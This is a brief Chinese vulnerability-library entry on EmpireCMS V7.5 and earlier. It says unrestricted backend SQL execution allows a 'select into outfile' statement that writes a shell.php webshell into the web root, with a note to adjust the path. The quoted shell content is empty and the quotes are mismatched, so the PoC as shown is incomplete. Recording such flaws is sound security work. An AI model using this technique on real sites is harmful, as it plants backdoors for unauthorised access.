—
title: ‘EmpireCMS’
date: Tue, 08 Sep 2020 13:42:30 +0000
draft: false
tags: [‘白阁-漏洞库’]
—
### 漏洞范围
EmpireCMS <= V7.5
### 漏洞验证
由于后端没有对执行的语句做限制导致可以执行恶意sql语句。  POC:
```
select '‘ into outfile ‘D:/phpstudy_pro/WWW/shell.php’
“`
根据实际路径修改路径即可。 
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容